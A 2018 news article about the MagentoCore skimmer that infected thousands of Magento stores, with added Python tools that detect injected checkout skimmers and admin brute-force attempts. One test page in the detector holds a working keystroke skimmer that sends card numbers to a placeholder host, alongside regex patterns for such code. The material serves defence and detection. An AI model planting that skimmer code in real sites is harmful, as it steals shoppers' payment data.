Posted on September 3, 2018 at 4:30 PM
A recent analysis of e-commerce stores from around the globe has revealed a huge problem: thousands of these stores have been found to be infected with payment-skimming malware. Worse, the malware continues to spread to 50+ new stores every day.
New malware detected
According to a new report by Willem de Groot, a security researcher and blogger, a new skimmer has already managed to infect thousands of e-commerce stores. He named the threat MagentoCore after the domain the skimmer script is loaded from; it targets stores running Magento, an open-source e-commerce platform.
De Groot found the skimmer on roughly 7,340 stores within the last six months, turning them into what he describes as zombie money machines. On that basis he called it the most successful skimmer ever.
The victims include large multinational companies as well as their customers, whose identities and card data were stolen. He estimates that the operators have made a substantial profit during the months the skimmer ran undetected.
How does MagentoCore work?
According to de Groot, MagentoCore gains its foothold by brute force: the attackers try passwords against a store's Magento admin panel until one works, which can take months. Once in, they inject a piece of malicious JavaScript into the site's HTML. That script records what customers type into the site's forms and sends it to a server controlled by the attackers, which collects usernames, passwords, personal details and full credit card data.
The malware also has a recovery mechanism. A separate component periodically re-downloads the malicious code, runs it, and then deletes it again, so a store that only removes the skimmer from its HTML is soon reinfected. De Groot analysed over 220,000 online stores and found that over 4% of them are infected with MagentoCore.
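The injection described above leaves two traces in the served HTML: a script tag pulling code from a host the store does not use, and inline code that listens for keystrokes and ships them elsewhere. The following checker is an added example, not code from de Groot's report or from Magento; the two checkout pages, the allowed-host list, the skimmer-host.invalid placeholder and the regex patterns are constructed for illustration.

```python
"""Flag a MagentoCore-style skimmer in checkout HTML (added example).

Not code from de Groot's report or the Magento project. Sample pages,
allowed hosts and the skimmer-host.invalid placeholder are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this store legitimately loads scripts from (assumed for the example).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}

# Inline-script traits of a keystroke skimmer: it listens for typing on the
# page and then sends what it captured to another server.
KEYLOG_RE = re.compile(r"addEventListener\(\s*['\"]key(?:up|down|press)['\"]")
EXFIL_RE = re.compile(r"XMLHttpRequest|fetch\(|navigator\.sendBeacon|new Image\(\)")


class ScriptCollector(HTMLParser):
    """Collect every <script> tag: external src values and inline bodies."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute values
        self.inline = []     # inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_checkout_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of findings; an empty list means nothing suspicious."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).netloc.lower()
        # A relative src has no host: it is served by the store itself.
        if host and host not in allowed_hosts:
            findings.append(f"external script from unexpected host: {host}")
    for body in parser.inline:
        if KEYLOG_RE.search(body) and EXFIL_RE.search(body):
            findings.append("inline script captures keystrokes and sends them elsewhere")
    return findings


# Constructed sample pages, not captured from any real store.
CLEAN_CHECKOUT = """<html><head>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="/static/frontend/app.js"></script>
</head><body><form id="co-payment-form"><input name="cc_number"></form>
<script>document.getElementById('co-payment-form').onsubmit = validate;</script>
</body></html>"""

INFECTED_CHECKOUT = """<html><head>
<script src="https://cdn.shop.example/checkout.js"></script>
<script type="text/javascript" src="//skimmer-host.invalid/mage.js"></script>
</head><body><form id="co-payment-form"><input name="cc_number"></form>
<script>
document.addEventListener('keyup', function(e){
  var x = new XMLHttpRequest();
  x.open('POST', 'https://skimmer-host.invalid/collect');
  x.send(document.forms[0].cc_number.value);
});
</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_CHECKOUT), ("infected", INFECTED_CHECKOUT)):
        print(name, scan_checkout_html(page) or ["no findings"])
```

Run the check against the HTML the browser actually receives on the checkout page, not against the template files on disk, because the recovery mechanism described above can put the code back into the served page after a template cleanup. A clean page yields no findings; the infected sample yields one finding for the foreign script host and one for the inline keylogger.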
4.2% of all Magento stores globally are currently leaking payment and customer data pic.twitter.com/Utw9W3t3Oa
— Willem de Groot (@gwillem) August 27, 2018
Among sites on .au domains, a little over 100 are infected at the time of writing. That figure is only a rough estimate, and the real number may be considerably higher.
Defending against the malware threat
David Markus, founder of the IT services company Combo, said that attacks like this usually succeed because business owners neglect to keep their software up to date and because password security is weak; together these make more and more such attacks possible.
Markus said that he himself had neglected to keep his firm's website updated, which resulted in an intrusion by hackers. He said the incident taught him a lesson, even though the hackers only changed a bit of text, which is nowhere near as serious as what is currently happening with MagentoCore.
He went on to encourage business owners to watch constantly for new patches and apply them immediately. De Groot, for his part, advised any business that suspects it is infected to follow some key steps on the road to recovery: locate the flaw immediately and close every point of access as soon as it is found.
After that, de Groot advises restoring the website completely to a version of the code the owners are certain is clean. Finally, every business should have routine security procedures, above all regular patching and strong passwords for the site's staff accounts.
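Closing the point of access means, for MagentoCore, noticing the password guessing against the admin panel before it succeeds. The script below is an added example, not something from de Groot's report or from Magento: it reads web server access log lines in the common log format and flags any source IP that posts to the admin login path more than a threshold number of times inside a time window. The log lines, the /admin/ path, the threshold and the window are all constructed assumptions.

```python
"""Spot brute-force attempts against an admin login in access logs (added example).

Not code from de Groot's report or the Magento project. The log lines are
constructed, and the admin path, threshold and window are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

ADMIN_PATH = "/admin/"       # assumed admin URL prefix; Magento lets a store rename it
THRESHOLD = 5                # attempts from one IP ...
WINDOW_SECONDS = 600         # ... within this many seconds

# Common log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def find_bruteforce(lines, admin_path=ADMIN_PATH, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Return {ip: total_login_posts} for IPs that hit the admin login too fast."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        # Only login submissions count; page views of the admin URL are noise.
        if method == "POST" and path.startswith(admin_path):
            attempts[ip].append(ts)

    flagged = {}
    for ip, stamps in attempts.items():
        stamps.sort()
        start = 0
        # Sliding window over the sorted timestamps.
        for end in range(len(stamps)):
            while (stamps[end] - stamps[start]).total_seconds() > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged


# Constructed log lines; the addresses are documentation ranges, not real clients.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Aug/2018:10:00:01 +0000] "POST /admin/ HTTP/1.1" 302 0
198.51.100.4 - - [27/Aug/2018:10:00:02 +0000] "GET /checkout/ HTTP/1.1" 200 5120
203.0.113.7 - - [27/Aug/2018:10:00:03 +0000] "POST /admin/ HTTP/1.1" 302 0
203.0.113.7 - - [27/Aug/2018:10:00:05 +0000] "POST /admin/ HTTP/1.1" 302 0
this line is not a log entry
203.0.113.7 - - [27/Aug/2018:10:00:09 +0000] "POST /admin/ HTTP/1.1" 302 0
203.0.113.7 - - [27/Aug/2018:10:00:14 +0000] "POST /admin/ HTTP/1.1" 302 0
198.51.100.4 - - [27/Aug/2018:10:05:00 +0000] "POST /admin/ HTTP/1.1" 302 0
203.0.113.7 - - [27/Aug/2018:10:00:21 +0000] "POST /admin/ HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for ip, count in find_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {count} admin login posts, exceeds {THRESHOLD} in {WINDOW_SECONDS}s")
```

On the sample, only 203.0.113.7 is flagged; the single staff login from 198.51.100.4 is not. The limitation matters for this campaign: the article notes the guessing can run for months, and a low-and-slow attacker stays under any short window, so keep long log retention and compare per-IP totals as well. The check only reveals the attempt; the measures that actually stop it are the ones de Groot and Markus name, strong passwords and prompt patching, plus lockout or rate limiting on the admin login.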